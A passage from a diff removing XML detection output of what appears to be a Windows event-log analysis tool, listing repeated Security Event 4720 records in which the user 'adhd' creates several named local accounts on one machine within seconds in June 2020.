-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kyle</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4315</recordid>
-            <time>2020-06-11 22:04:55.368522200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.3685222Z'/&gt;&lt;EventRecordID&gt;4315&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brandon&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1045&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brandon&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brandon</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4309</recordid>
-            <time>2020-06-11 22:04:55.260882600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.2608826Z'/&gt;&lt;EventRecordID&gt;4309&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Evelyn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1044&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Evelyn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Evelyn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4303</recordid>
-            <time>2020-06-11 22:04:55.163380000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.1633800Z'/&gt;&lt;EventRecordID&gt;4303&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Austin&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1043&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Austin&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Austin</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4297</recordid>
-            <time>2020-06-11 22:04:55.43628000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.0436280Z'/&gt;&lt;EventRecordID&gt;4297&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Roger&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1042&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Roger&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Roger</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4291</recordid>
-            <time>2020-06-11 22:04:54.970865300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.9708653Z'/&gt;&lt;EventRecordID&gt;4291&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Bobby&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1041&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Bobby&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Bobby</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4285</recordid>
-            <time>2020-06-11 22:04:54.884694700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.8846947Z'/&gt;&lt;EventRecordID&gt;4285&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Grace&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1040&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Grace&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Grace</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4279</recordid>
-            <time>2020-06-11 22:04:54.801610700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.8016107Z'/&gt;&lt;EventRecordID&gt;4279&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Adam&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1039&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Adam&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Adam</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4273</recordid>
-            <time>2020-06-11 22:04:54.697028100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.6970281Z'/&gt;&lt;EventRecordID&gt;4273&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Karen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1038&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Karen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Karen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4267</recordid>
-            <time>2020-06-11 22:04:54.623558700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.6235587Z'/&gt;&lt;EventRecordID&gt;4267&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Donald&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1037&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Donald&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

